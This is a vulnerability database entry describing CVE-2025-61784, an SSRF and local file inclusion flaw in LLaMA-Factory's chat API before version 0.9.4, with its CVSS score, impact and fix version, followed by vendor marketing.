
Cloud Vulnerability DB
A community-led vulnerabilities database
LLaMA-Factory, a tuning library for large language models, disclosed a critical vulnerability (CVE-2025-61784) discovered on October 7, 2025. The vulnerability affects versions prior to 0.9.4 and involves both Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) vulnerabilities in the chat API (GitHub Advisory).
The vulnerability exists in the _process_request
function within src/llamafactory/api/chat.py
. The function processes multimodal content including images, videos, and audio provided via URLs. When handling URLs, it performs insufficient validation, allowing direct HTTP GET requests using requests.get(url, stream=True).raw
without proper URL sanitization. The vulnerability has received a CVSS v3.1 base score of 7.6 (High) with vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L (GitHub Advisory).
The vulnerability allows authenticated users to force the server to make arbitrary HTTP requests to internal and external networks, potentially exposing sensitive internal services, enabling reconnaissance of internal networks, or facilitating interaction with third-party services. Additionally, the LFI aspect enables users to read arbitrary files from the server's filesystem (GitHub Advisory).
The vulnerability has been fixed in version 0.9.4 of LLaMA-Factory. Users should upgrade to this version or later to protect against these vulnerabilities. The fix includes proper validation and sanitization of URLs before processing them (GitHub Advisory, GitHub Commit).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."